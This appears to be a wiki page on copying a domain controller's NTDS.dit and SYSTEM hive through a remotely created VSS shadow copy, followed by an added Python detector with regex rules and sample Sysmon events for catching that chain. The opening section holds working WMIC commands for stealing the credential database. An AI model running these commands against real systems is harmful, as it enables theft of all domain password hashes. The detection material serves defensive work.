== Pulling the ntds.dit remotely using VSS shadow copy (over WMI or PowerShell Remoting) ==
Use WMIC (or PowerShell remoting) to create a VSS shadow copy on the DC (or reuse an existing one) and copy the files out of it.<syntaxhighlight lang="powershell">
# Take a VSS snapshot of the C: drive on the DC. Output is logged to c:\vss.log
# (stdout is redirected to the file first, then stderr is sent to the same place).
wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c vssadmin create shadow /for=c: > c:\vss.log 2>&1"
# Once the VSS snapshot has completed, copy NTDS.dit and the SYSTEM registry hive out of the shadow copy to the C: drive on the DC.
wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\temp\NTDS.dit > C:\vss2.log 2>&1"
wmic /node:Tech-DC /user:DOMAIN\someuser /password:cleartextpass process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\temp\SYSTEM.hive > C:\vss2.log 2>&1"
# Copy the two files from C:\Windows\temp on the DC to the local workstation over the admin share.
copy \\Tech-DC\c$\windows\temp\ntds.dit c:\temp
copy \\Tech-DC\c$\windows\temp\system.hive c:\temp
# insert impacket-secretsdump command here
</syntaxhighlight>Use a hash instead of clear-text credentials. Note: this requires creating a new logon session with a ticket imported from the user's hash.<syntaxhighlight lang="powershell">
# In the commands above, replace the /user switch with the /authority switch so WMIC
# authenticates with the Kerberos ticket held by the current session.
/user:DOMAIN\someuser -> /authority:"kerberos:DOMAIN\someuser"
</syntaxhighlight>
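The chain above leaves a distinctive trail on the domain controller: a process-creation event for `vssadmin create shadow`, followed by `copy` commands whose source path points into `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN`, all spawned by the WMI provider host (WmiPrvSE.exe) or the WinRM host (wsmprovhost.exe) when the commands come in remotely. The detector below is an added example written for this page, not code from the wiki or from any tool it mentions. It runs over a handful of constructed Sysmon Event ID 1 (process creation) records flattened into a `Key=Value|Key=Value` line format that is an assumption of this example; the field names (`Computer`, `User`, `ParentImage`, `Image`, `CommandLine`) follow Sysmon's schema.

```python
"""
Added example (not part of the original wiki page): detect the VSS-based
NTDS.dit extraction chain in a stream of process-creation events.
Record format and sample events are constructed for this example.
"""
import re
from typing import Dict, Iterable, List

# Detection rules: (rule name, case-insensitive regex over CommandLine).
RULES = [
    ("vss_snapshot_created",
     re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I)),
    ("ntds_copied_from_shadow",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\Windows\\NTDS\\ntds\.dit", re.I)),
    ("system_hive_copied_from_shadow",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\Windows\\System32\\config\\SYSTEM", re.I)),
]

# Parent processes that indicate the command arrived over WMI or PowerShell remoting.
REMOTE_PARENTS = ("wmiprvse.exe", "wsmprovhost.exe")

# Constructed sample events (flattened Sysmon Event ID 1 fields).
SAMPLE_EVENTS = [
    "Computer=DC01|User=DOMAIN\\someuser|ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
    "|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd /c vssadmin create shadow /for=c: > c:\\vss.log 2>&1",
    "Computer=DC01|User=DOMAIN\\someuser|ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
    "|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1"
    "\\Windows\\NTDS\\NTDS.dit C:\\Windows\\temp\\NTDS.dit",
    "Computer=DC01|User=DOMAIN\\someuser|ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
    "|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1"
    "\\Windows\\System32\\config\\SYSTEM C:\\Windows\\temp\\SYSTEM.hive",
    # Benign noise: a backup agent and a locally scheduled shadow copy on a file server.
    "Computer=WS07|User=DOMAIN\\backupsvc|ParentImage=C:\\Windows\\System32\\services.exe"
    "|Image=C:\\Program Files\\Backup\\agent.exe|CommandLine=agent.exe --schedule nightly",
    "Computer=FS02|User=NT AUTHORITY\\SYSTEM|ParentImage=C:\\Windows\\System32\\svchost.exe"
    "|Image=C:\\Windows\\System32\\vssadmin.exe|CommandLine=vssadmin create shadow /for=D:",
]


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'Key=Value|Key=Value' record into a dict (constructed format)."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules whose regex matches the event's CommandLine."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in RULES if rx.search(cmd)]


def analyze(lines: Iterable[str]) -> Dict[str, list]:
    """
    Report every rule hit, mark hits launched from a WMI/WinRM host process as
    remote, and escalate any host that both created a shadow copy and copied
    NTDS.dit out of it (the full chain, regardless of how it was launched).
    """
    findings: List[Dict[str, object]] = []
    rules_per_host: Dict[str, set] = {}
    for line in lines:
        event = parse_event(line)
        hits = classify(event)
        if not hits:
            continue
        host = event.get("Computer", "?")
        parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        remote = parent in REMOTE_PARENTS
        rules_per_host.setdefault(host, set()).update(hits)
        for rule in hits:
            findings.append({"host": host, "rule": rule, "remote": remote,
                             "user": event.get("User", "?")})
    chain = {"vss_snapshot_created", "ntds_copied_from_shadow"}
    escalated = [h for h, seen in rules_per_host.items() if chain <= seen]
    return {"findings": findings, "escalated_hosts": escalated}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for f in result["findings"]:
        print(f"{f['host']:<6} {f['rule']:<32} remote={f['remote']} user={f['user']}")
    print("escalated:", result["escalated_hosts"])
```

Run against the sample stream, the lone `vssadmin create shadow` on FS02 is reported but not escalated (a single shadow copy creation is routine backup behaviour), while DC01 is escalated because the snapshot and the NTDS.dit copy both occur there, and every hit on DC01 carries the WmiPrvSE.exe parent that marks it as remotely launched. The final step of the page, pulling the files back over `\\Tech-DC\c$`, is not a process-creation event on the DC; it shows up in the DC's file-share auditing (Security event 5145 with the `c$` share and a `RelativeTargetName` under `windows\temp`) and makes a useful second signal to correlate with the escalation above.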
Latest revision as of 12:57, 19 September 2023